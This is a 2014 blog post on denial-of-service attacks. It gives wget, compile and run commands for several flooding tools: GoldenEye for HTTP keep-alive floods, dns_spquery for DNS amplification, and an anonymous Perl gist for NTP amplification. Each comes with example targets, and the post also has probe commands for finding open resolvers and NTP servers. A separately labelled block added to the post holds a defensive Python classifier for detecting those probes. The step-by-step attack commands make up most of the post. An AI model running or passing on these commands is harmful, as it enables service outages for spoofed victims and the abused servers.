Friday, 21 February 2014

DDoS / DoS / amplification attacks ++

1st post in 2014... finally! After 8 or so months of looking at the screen, I managed to remember how to use my keyboard... and what could be more trendy and appropriate than a tribute to DoS attacks :) So go on! Get yourselves in trouble! (Please don't!) DISCLAIMER: All information here is for educational purposes. May the Force be with you!

Russia's dirty secret (Golden eye):

Attack Vector exploited: HTTP Keep Alive + NoCache

wget https://raw.github.com/jseidl/GoldenEye/master/goldeneye.py

python goldeneye.py http://192.168.1.10 -w 10 -s 6 -m random

(that's the light-handed approach...)

DNS Amplification attack:

A well-documented attack that takes advantage of UDP packet spoofing and misconfigured DNS servers.

How to test:
dig ANY isc.org @x.x.x.x
Where to test:
http://openresolverproject.org/

The tool (good old packetstorm):
wget http://packetstorm.foofus.com/DoS/dns_spquery.c.gz
gunzip dns_spquery.c.gz
gcc dns_spquery.c -o dns_spquery

./dns_spquery <target_ip> <dns_to_use> <some_fqdn_to_resolve>

NTP Amplification attack:

A well-documented attack that takes advantage of UDP packet spoofing and misconfigured NTP servers.

How to test:
ntpdc -c monlist <target_ntp_server>
or
nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target_ntp_server>
(script available here http://nmap.org/svn/scripts/ntp-monlist.nse)
Where to test:
http://openntpproject.org/
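
An added example, not part of the original post: a small Python classifier a defender could run over captured UDP payloads to flag the two probes shown under "How to test" (a DNS ANY query and an NTP mode 7 monlist request) arriving at their own servers. The function names and sample packets are constructed for illustration; request codes 20 and 42 are ntpd's REQ_MON_GETLIST and REQ_MON_GETLIST_1.

```python
import struct

# Mode 7 request codes that return ntpd's monitor list:
# REQ_MON_GETLIST (20) and REQ_MON_GETLIST_1 (42).
NTP_MONLIST_CODES = {20, 42}
DNS_QTYPE_ANY = 255

def classify_ntp(payload: bytes) -> str:
    """Classify a UDP/123 payload; flag mode 7 monlist requests."""
    if len(payload) < 4:
        return "malformed"
    first, request_code = payload[0], payload[3]
    mode = first & 0x07
    is_response = bool(first & 0x80)  # R bit, meaningful for mode 6/7
    if mode == 7 and not is_response and request_code in NTP_MONLIST_CODES:
        return "ntp-monlist-request"
    return f"ntp-mode-{mode}"

def classify_dns(payload: bytes) -> str:
    """Classify a UDP/53 payload; flag queries whose first question is ANY."""
    if len(payload) < 12:
        return "malformed"
    _txid, flags, qdcount = struct.unpack("!HHH", payload[:6])
    if flags & 0x8000 or qdcount == 0:
        return "dns-other"  # a response, or a query with no question
    pos = 12
    while pos < len(payload) and payload[pos] != 0:
        if payload[pos] & 0xC0:  # compression pointer: not valid here
            return "malformed"
        pos += 1 + payload[pos]
    pos += 1  # skip the root label
    if pos + 4 > len(payload):
        return "malformed"
    qtype, _qclass = struct.unpack("!HH", payload[pos:pos + 4])
    return "dns-any-query" if qtype == DNS_QTYPE_ANY else "dns-query"

def sample_dns_query(qtype: int) -> bytes:
    """Constructed sample: query for isc.org with RD set."""
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    return header + b"\x03isc\x03org\x00" + struct.pack("!HH", qtype, 1)

# Constructed sample payloads (not captured traffic).
SAMPLE_NTP_MONLIST = bytes([0x17, 0x00, 0x03, 0x2A]) + bytes(4)
SAMPLE_NTP_CLIENT = bytes([0x23]) + bytes(47)  # ordinary mode 3 client request

if __name__ == "__main__":
    print(classify_ntp(SAMPLE_NTP_MONLIST), classify_ntp(SAMPLE_NTP_CLIENT))
    print(classify_dns(sample_dns_query(255)), classify_dns(sample_dns_query(1)))
```

Hits from addresses that never otherwise talk to the server are the ones worth alerting on, since a spoofed source address means the "client" is the intended victim.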

The tool:
wget https://gist.githubusercontent.com/anonymous/d3abecdf9e828b3b7c37/raw/efe9154d88c67e2a1775a2f58cf2396ccc1e463d/gistfile1.pl
perl gistfile1.pl <target_IP> <src_port> <duration_in_sec> <list_file_name> <packet_payload_repetition??> <thread_number>

so that would be
perl gistfile1.pl 192.168.1.1 53 60 list.txt 2 10
or something similar...


Stay tuned for more..